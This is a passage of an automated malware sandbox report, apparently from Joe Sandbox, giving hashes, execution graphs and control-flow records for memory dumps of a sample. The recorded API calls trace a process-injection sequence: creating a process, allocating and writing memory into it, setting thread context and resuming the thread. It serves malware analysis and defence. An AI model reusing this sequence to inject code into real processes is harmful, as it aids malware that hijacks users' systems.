                                                      • Instruction Fuzzy Hash: 3C11B3B1D012199FDB00CF9AD984ADEFFB4FB49354F50852AE918B7210C374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_820000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5cb896194fc987fe4f229d9e7e31f809aa0a28b661c3b7e76ffd6806e8ac432a
                                                      • Instruction ID: 225d0aac90b487b92d7ca09267859aad25ae8dfa203887d4bd097a923f3cd195
                                                      • Opcode Fuzzy Hash: 5cb896194fc987fe4f229d9e7e31f809aa0a28b661c3b7e76ffd6806e8ac432a
                                                      • Instruction Fuzzy Hash: 62014B317001248BDB24DABEE41976BA2DAEBE9710F24883AF10AC7385DD65EC428391
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_820000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed7346f63c3828f9e935a8298e2658fb3d475b240ed4f9a714a5b5bceaae83cd
                                                      • Instruction ID: 9d95faff938a8981c29ebdedac141c7786d7d1e152669e4a360d26ac3124863d
                                                      • Opcode Fuzzy Hash: ed7346f63c3828f9e935a8298e2658fb3d475b240ed4f9a714a5b5bceaae83cd
                                                      • Instruction Fuzzy Hash: 1D01A4357001200BDB24EA7DA45472E63DAE7C9720F10883AF54EC7384DE65EC428381
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_820000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 461cb7decbea31b9ef8e1ce6db4b151047d11cbef63e1fb4536985d20bbd66b1
                                                      • Instruction ID: 77873c0163a290d94c09e1e54c4885da27a499c749d57708b96fc0298d8817f3
                                                      • Opcode Fuzzy Hash: 461cb7decbea31b9ef8e1ce6db4b151047d11cbef63e1fb4536985d20bbd66b1
                                                      • Instruction Fuzzy Hash: 410181317109244BE710EA7DE459B2E73D5FBCA750F10983AE50ECB344DE65EC428781
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_820000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78f90349091dfe2ef7ecd54201c521277206cc214c3df628121cdb6008a40d72
                                                      • Instruction ID: 55c6f08320abaeddc56d0601f50878406a5a2dd5d55681359ca9b290acbf37b8
                                                      • Opcode Fuzzy Hash: 78f90349091dfe2ef7ecd54201c521277206cc214c3df628121cdb6008a40d72
                                                      • Instruction Fuzzy Hash: 2DF05E35A08628DFDF24CE44F9692EC77A0FB50316F2944A1D901D7294D7789BC2C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_820000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b00c69d4e89f1f5e330bcbed1781b65ac57f8cf4c8ff2dfa5141b1e956416ae
                                                      • Instruction ID: 7686d9c17007765284c8f552308aff704193df5c6787717367eacffd05cadc60
                                                      • Opcode Fuzzy Hash: 3b00c69d4e89f1f5e330bcbed1781b65ac57f8cf4c8ff2dfa5141b1e956416ae
                                                      • Instruction Fuzzy Hash: 4BE09232E0022857DF2096A8D84458EBBA9E785761F00057AE909E7200D931DC4582D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_820000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (9_$(9_$\>_$|=_
                                                      • API String ID: 0-1534950688
                                                      • Opcode ID: 3fc207e5eaaf2b754e430efa34f22cd3d301d61bc8df0f6196f153fe23e90e02
                                                      • Instruction ID: f002b13e56b6b540625f63c7bc5872d9fc9356ffc4e26a9162be2ef080e8e334
                                                      • Opcode Fuzzy Hash: 3fc207e5eaaf2b754e430efa34f22cd3d301d61bc8df0f6196f153fe23e90e02
                                                      • Instruction Fuzzy Hash: 9B912D30A006298FDB14DF64D994B9DBBB2FF88300F118699D509AB355DB74EE86CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.655414059.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_820000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: q_$ q_$4p_$4r_
                                                      • API String ID: 0-1440290909
                                                      • Opcode ID: d8997191b749d9b9df886dcf0af7aba10e9fe4f9445f70e016619fc17a4d4bc5
                                                      • Instruction ID: db740669e991d5cc737788f1bbfc94f3a24e5c5a12e3ba2f7047ed1480a92566
                                                      • Opcode Fuzzy Hash: d8997191b749d9b9df886dcf0af7aba10e9fe4f9445f70e016619fc17a4d4bc5
                                                      • Instruction Fuzzy Hash: 6A716231A0071ACBDB14CFA5D4446AEBBF2FF88314F24866AD405EB345EB74E985CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:14%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:121
                                                      Total number of Limit Nodes:1
                                                      execution_graph 10740 c00808 10741 c0056c 10740->10741 10743 c0057b 10741->10743 10747 c01466 10741->10747 10762 c013aa 10741->10762 10776 c013b8 10741->10776 10742 c00638 10748 c013f4 10747->10748 10749 c01469 10747->10749 10756 c013da 10748->10756 10790 c0208a 10748->10790 10795 c01e25 10748->10795 10800 c01b04 10748->10800 10808 c020dd 10748->10808 10813 c0215c 10748->10813 10818 c01e3b 10748->10818 10822 c01ada 10748->10822 10827 c01af8 10748->10827 10832 c01c17 10748->10832 10837 c01855 10748->10837 10841 c01b92 10748->10841 10749->10742 10756->10742 10763 c013d2 10762->10763 10764 c013da 10763->10764 10765 c01b04 4 API calls 10763->10765 10766 c01e25 2 API calls 10763->10766 10767 c0208a 2 API calls 10763->10767 10768 c01b92 2 API calls 10763->10768 10769 c01855 CreateProcessA 10763->10769 10770 c01c17 2 API calls 10763->10770 10771 c01af8 2 API calls 10763->10771 10772 c01ada 2 API calls 10763->10772 10773 c01e3b 2 API calls 10763->10773 10774 c0215c 2 API calls 10763->10774 10775 c020dd 2 API calls 10763->10775 10764->10742 10765->10764 10766->10764 10767->10764 10768->10764 10769->10764 10770->10764 10771->10764 10772->10764 10773->10764 10774->10764 10775->10764 10777 c013d2 10776->10777 10778 c013da 10777->10778 10779 c01b04 4 API calls 10777->10779 10780 c01e25 2 API calls 10777->10780 10781 c0208a 2 API calls 10777->10781 10782 c01b92 2 API calls 10777->10782 10783 c01855 CreateProcessA 10777->10783 10784 c01c17 2 API calls 10777->10784 10785 c01af8 2 API calls 10777->10785 10786 c01ada 2 API calls 10777->10786 10787 c01e3b 2 API calls 10777->10787 10788 c0215c 2 API calls 10777->10788 10789 c020dd 2 API calls 10777->10789 10778->10742 10779->10778 10780->10778 10781->10778 10782->10778 10783->10778 10784->10778 10785->10778 10786->10778 10787->10778 10788->10778 10789->10778 10791 c02097 10790->10791 10846 25ec20 10791->10846 10850 25ec28 10791->10850 10792 c02178 10796 c01db7 10795->10796 10797 c01de3 10795->10797 10854 25f7e0 10796->10854 10858 25f7d9 10796->10858 10797->10756 10801 c01b1e 10800->10801 10802 c01aa7 10800->10802 10862 25f581 10801->10862 10866 25f588 10801->10866 10803 c01b7a 10802->10803 10806 25ec20 ResumeThread 10802->10806 10807 25ec28 ResumeThread 10802->10807 10803->10756 10806->10803 10807->10803 10809 c020e6 10808->10809 10811 25f7e0 WriteProcessMemory 10809->10811 10812 25f7d9 WriteProcessMemory 10809->10812 10810 c02289 10811->10810 10812->10810 10814 c020ec 10813->10814 10816 25f7e0 WriteProcessMemory 10814->10816 10817 25f7d9 WriteProcessMemory 10814->10817 10815 c02289 10816->10815 10817->10815 10820 25f7e0 WriteProcessMemory 10818->10820 10821 25f7d9 WriteProcessMemory 10818->10821 10819 c01a4c 10819->10756 10820->10819 10821->10819 10823 c01ae0 10822->10823 10824 c02178 10823->10824 10825 25ec20 ResumeThread 10823->10825 10826 25ec28 ResumeThread 10823->10826 10825->10824 10826->10824 10828 c01d7a 10827->10828 10870 c024c0 10828->10870 10875 c024d0 10828->10875 10829 c01d96 10833 c01c24 10832->10833 10835 25f7e0 WriteProcessMemory 10833->10835 10836 25f7d9 WriteProcessMemory 10833->10836 10834 c01de3 10834->10756 10835->10834 10836->10834 10838 c0186f 10837->10838 10888 c00040 10838->10888 10842 c01b98 10841->10842 10892 25f940 10842->10892 10896 25f938 10842->10896 10843 c01bbb 10843->10756 10847 25ec6c ResumeThread 10846->10847 10849 25ecbe 10847->10849 10849->10792 10851 25ec6c ResumeThread 10850->10851 10853 25ecbe 10851->10853 10853->10792 10855 25f82c WriteProcessMemory 10854->10855 10857 25f8cb 10855->10857 10857->10797 10859 25f82c WriteProcessMemory 10858->10859 10861 25f8cb 10859->10861 10861->10797 10863 25f5d1 Wow64SetThreadContext 10862->10863 10865 25f64f 10863->10865 10865->10802 10867 25f5d1 Wow64SetThreadContext 10866->10867 10869 25f64f 10867->10869 10869->10802 10871 c024e5 10870->10871 10880 25f6b0 10871->10880 10884 25f6b8 10871->10884 10872 c02504 10872->10829 10876 c024e5 10875->10876 10878 25f6b0 VirtualAllocEx 10876->10878 10879 25f6b8 VirtualAllocEx 10876->10879 10877 c02504 10877->10829 10878->10877 10879->10877 10881 25f6fc VirtualAllocEx 10880->10881 10883 25f77a 10881->10883 10883->10872 10885 25f6fc VirtualAllocEx 10884->10885 10887 25f77a 10885->10887 10887->10872 10889 c000c7 CreateProcessA 10888->10889 10891 c00325 10889->10891 10893 25f98c ReadProcessMemory 10892->10893 10895 25fa0a 10893->10895 10895->10843 10897 25f98c ReadProcessMemory 10896->10897 10899 25fa0a 10897->10899 10899->10843

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1056 c00040-c000d9 1058 c00122-c0014a 1056->1058 1059 c000db-c000f2 1056->1059 1062 c00190-c001e6 1058->1062 1063 c0014c-c00160 1058->1063 1059->1058 1064 c000f4-c000f9 1059->1064 1072 c001e8-c001fc 1062->1072 1073 c0022c-c00323 CreateProcessA 1062->1073 1063->1062 1074 c00162-c00167 1063->1074 1065 c000fb-c00105 1064->1065 1066 c0011c-c0011f 1064->1066 1067 c00107 1065->1067 1068 c00109-c00118 1065->1068 1066->1058 1067->1068 1068->1068 1071 c0011a 1068->1071 1071->1066 1072->1073 1081 c001fe-c00203 1072->1081 1092 c00325-c0032b 1073->1092 1093 c0032c-c00411 1073->1093 1075 c00169-c00173 1074->1075 1076 c0018a-c0018d 1074->1076 1078 c00175 1075->1078 1079 c00177-c00186 1075->1079 1076->1062 1078->1079 1079->1079 1082 c00188 1079->1082 1084 c00205-c0020f 1081->1084 1085 c00226-c00229 1081->1085 1082->1076 1086 c00211 1084->1086 1087 c00213-c00222 1084->1087 1085->1073 1086->1087 1087->1087 1089 c00224 1087->1089 1089->1085 1092->1093 1105 c00421-c00425 1093->1105 1106 c00413-c00417 1093->1106 1108 c00435-c00439 1105->1108 1109 c00427-c0042b 1105->1109 1106->1105 1107 c00419 1106->1107 1107->1105 1111 c00449-c0044d 1108->1111 1112 c0043b-c0043f 1108->1112 1109->1108 1110 c0042d 1109->1110 1110->1108 1114 c00483-c0048e 1111->1114 1115 c0044f-c00478 1111->1115 1112->1111 1113 c00441 1112->1113 1113->1111 1118 c0048f 1114->1118 1115->1114 1118->1118
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C00307
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.421574498.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_c00000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: d918a6298f53d23195c7f0f88b1bb7b684c5d97eeda40d5a0d48b166bb0aa0f8
                                                      • Instruction ID: 351f86387d26197bc9f51e909cbbb374c57efb9a8a958accc84b8078a0e75255
                                                      • Opcode Fuzzy Hash: d918a6298f53d23195c7f0f88b1bb7b684c5d97eeda40d5a0d48b166bb0aa0f8
                                                      • Instruction Fuzzy Hash: 18C126B0D002298FDF20CFA4C845BEEBBB1BB49300F1095AAD519B7280DB749A85CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1232 25f7d9-25f84b 1234 25f862-25f8c9 WriteProcessMemory 1232->1234 1235 25f84d-25f85f 1232->1235 1237 25f8d2-25f924 1234->1237 1238 25f8cb-25f8d1 1234->1238 1235->1234 1238->1237
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F8B3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 55a3ad165b9ca59f5ff0ca548391ec9fe3594e6635141dbe6a20b86a552365f2
                                                      • Instruction ID: 827cd44225fe86fbf6b1e7bc520a1901a6aaefae3df05cd01729d3405505cf29
                                                      • Opcode Fuzzy Hash: 55a3ad165b9ca59f5ff0ca548391ec9fe3594e6635141dbe6a20b86a552365f2
                                                      • Instruction Fuzzy Hash: EC41AAB4D012489FCF00CFA9D984AEEBBF1BF49310F20942AE814BB210D335AA55CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1243 25f7e0-25f84b 1245 25f862-25f8c9 WriteProcessMemory 1243->1245 1246 25f84d-25f85f 1243->1246 1248 25f8d2-25f924 1245->1248 1249 25f8cb-25f8d1 1245->1249 1246->1245 1249->1248
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F8B3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: de2f17acc134f1e8854aa3d9fbb5a8c5ee61157869b20557bb445374cba0ce64
                                                      • Instruction ID: 6b8bed9fe7e4b4204f293d8ad0d554b694842ecd50361cda05e677c00f9d2aad
                                                      • Opcode Fuzzy Hash: de2f17acc134f1e8854aa3d9fbb5a8c5ee61157869b20557bb445374cba0ce64
                                                      • Instruction Fuzzy Hash: FB41ABB5D012589FDF00CFA9D984AEEBBF1BB49310F20942AE814BB210D335AA55CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1254 25f938-25fa08 ReadProcessMemory 1257 25fa11-25fa63 1254->1257 1258 25fa0a-25fa10 1254->1258 1258->1257
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F9F2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: e50c2f0664e4c692ea3dbc7b6abda195775b8d05a84de29c68bf29644ab1d9de
                                                      • Instruction ID: 5ebfc0ab9ecc6943f7e1454bf8a9b1320eaa5893c2ebe0ffce2e79639c5dfc55
                                                      • Opcode Fuzzy Hash: e50c2f0664e4c692ea3dbc7b6abda195775b8d05a84de29c68bf29644ab1d9de
                                                      • Instruction Fuzzy Hash: 8741A9B8D002589FCF10CFA9D984AEEFBB1BF49310F20942AE814B7210D775A955DF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1263 25f940-25fa08 ReadProcessMemory 1266 25fa11-25fa63 1263->1266 1267 25fa0a-25fa10 1263->1267 1267->1266
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F9F2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: d48b4b156c6ba28d06b82d8dd901eaf00c1cf69ddc655ea208bf698168a6f5e4
                                                      • Instruction ID: 8ac17e2ea1022450c9385330fd0cf94b803718ee242699eae42f82b3f43a23c8
                                                      • Opcode Fuzzy Hash: d48b4b156c6ba28d06b82d8dd901eaf00c1cf69ddc655ea208bf698168a6f5e4
                                                      • Instruction Fuzzy Hash: 7D4199B4D00258DFCF10CFA9D984AEEFBB1BB49310F20942AE814BB210D775A955DF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1272 25f6b0-25f778 VirtualAllocEx 1275 25f781-25f7cb 1272->1275 1276 25f77a-25f780 1272->1276 1276->1275
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025F762
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 7638d8e6f9d9cff8eb96267051a8bb45c449d08dcba9eb98ebd97f5e7de32077
                                                      • Instruction ID: c5a769833f1aa6329240872cfb6cd30ca2e42a3505d38d0b9f7bc4f6a1108ca3
                                                      • Opcode Fuzzy Hash: 7638d8e6f9d9cff8eb96267051a8bb45c449d08dcba9eb98ebd97f5e7de32077
                                                      • Instruction Fuzzy Hash: 9C418AB8D002589FCF10CFA9D984AEEFBB1BF49310F20942AE815BB210D775A916CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1281 25f6b8-25f778 VirtualAllocEx 1284 25f781-25f7cb 1281->1284 1285 25f77a-25f780 1281->1285 1285->1284
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025F762
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: aec2d5bd80f559f5a6e1a77e3bec6ab4453b6e3e20507df3645e531257ac47c0
                                                      • Instruction ID: 7b9fad3c4e73d9c7ee46c6b283df2aff0bb25d7bcb97fbd703c6fcb09bf28f96
                                                      • Opcode Fuzzy Hash: aec2d5bd80f559f5a6e1a77e3bec6ab4453b6e3e20507df3645e531257ac47c0
                                                      • Instruction Fuzzy Hash: 84418AB8D002589FCF10CFA9D984ADEFBB5AB49310F20942AE814BB210D775A915CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1290 25f581-25f5e8 1292 25f5ff-25f64d Wow64SetThreadContext 1290->1292 1293 25f5ea-25f5fc 1290->1293 1295 25f656-25f6a2 1292->1295 1296 25f64f-25f655 1292->1296 1293->1292 1296->1295
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025F637
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 6ef162eac7777603c560356c6dd990502e530af2290e0938dc0ff9000a0ff685
                                                      • Instruction ID: 6886183d957e62a1cbeb2f9c851071328ba3646ee5ec86f82d3ddf209f9c9095
                                                      • Opcode Fuzzy Hash: 6ef162eac7777603c560356c6dd990502e530af2290e0938dc0ff9000a0ff685
                                                      • Instruction Fuzzy Hash: 3541DCB4D102589FDF10CFA9D984AEEFBB1BF49310F24842AE814B7250C739A949CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1301 25f588-25f5e8 1303 25f5ff-25f64d Wow64SetThreadContext 1301->1303 1304 25f5ea-25f5fc 1301->1304 1306 25f656-25f6a2 1303->1306 1307 25f64f-25f655 1303->1307 1304->1303 1307->1306
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025F637
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: ecdb4b4888815ae1bd92384e4bfd416c8180a0d81bbd3e401116373673f3d561
                                                      • Instruction ID: 027e909512fed5294648b0c89648868fdc575a50c2289191384de860c729c7e4
                                                      • Opcode Fuzzy Hash: ecdb4b4888815ae1bd92384e4bfd416c8180a0d81bbd3e401116373673f3d561
                                                      • Instruction Fuzzy Hash: DB41BCB4D102589FDB10CFA9D984AEEBBB5AB49310F24842AE814B7250D739A949CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1312 25ec20-25ecbc ResumeThread 1315 25ecc5-25ed07 1312->1315 1316 25ecbe-25ecc4 1312->1316 1316->1315
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0025ECA6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 30c7c6df18a51cad4cbe07b7c2c9f7085ecd2cd8ae58e421be49d9a71061dbb4
                                                      • Instruction ID: 2d424eb0a8275a5a02f4d457ec6e74a3ccb211614089408cfed19dfb0cc71236
                                                      • Opcode Fuzzy Hash: 30c7c6df18a51cad4cbe07b7c2c9f7085ecd2cd8ae58e421be49d9a71061dbb4
                                                      • Instruction Fuzzy Hash: 0431CCB4D102189FDF14CFA9D984ADEFBB5EF49310F24942AE814BB250C735A905CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0025ECA6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.420610581.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_250000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 5a01ef5c6cd51ed4388c127976848bc3cddf32d1336e31863bf69f5b3f0681a4
                                                      • Instruction ID: a5764cc750a978e9f433c3a4509e11c3fe6285cc58a035a923ddeb856ff8e333
                                                      • Opcode Fuzzy Hash: 5a01ef5c6cd51ed4388c127976848bc3cddf32d1336e31863bf69f5b3f0681a4
                                                      • Instruction Fuzzy Hash: 9131B9B4D102189FDF14CFA9D984AEEFBB5EB89310F24942AE814B7310D735A905CF99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b4a480f66c6e3834d77545d77ca28bab71be6cec2afc164cc0724f236431991
                                                      • Instruction ID: cbd88f06192f9292f473cd92ad7a3e2e2fde261cd65217d717282eb79f33f49d
                                                      • Opcode Fuzzy Hash: 0b4a480f66c6e3834d77545d77ca28bab71be6cec2afc164cc0724f236431991
                                                      • Instruction Fuzzy Hash: 2D61B2B4E052198FDB08CFA5D984AEEBBB6FF89300F10912AD419AB355DB34A945CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5f4a4cbd3828b4d884e3312b3f92e99cee7ae530b1956523f1d5d09d0d06651
                                                      • Instruction ID: 25f0764ed9137a85b75d6154d80a529400a0c39dff58eb3a803e1c1cbfb0ddef
                                                      • Opcode Fuzzy Hash: f5f4a4cbd3828b4d884e3312b3f92e99cee7ae530b1956523f1d5d09d0d06651
                                                      • Instruction Fuzzy Hash: 9A51C370A04208DFDB09DFA9D884AEEBBF6EB8E301F509065E415B7358CB749946CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0dd0d26590b10b296a49f2baf9f59a4e80bd2397da7ed7a75134623840d90c16
                                                      • Instruction ID: 5e6910a4bfbaf5cb70902366f56ff481213e968993e7b70e140f1550e48ffc81
                                                      • Opcode Fuzzy Hash: 0dd0d26590b10b296a49f2baf9f59a4e80bd2397da7ed7a75134623840d90c16
                                                      • Instruction Fuzzy Hash: DF410274E012189FCB00EFA8D884AEEBBB1FB8C321F109565E810B3355D775A994CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.424376815.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_41d0000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
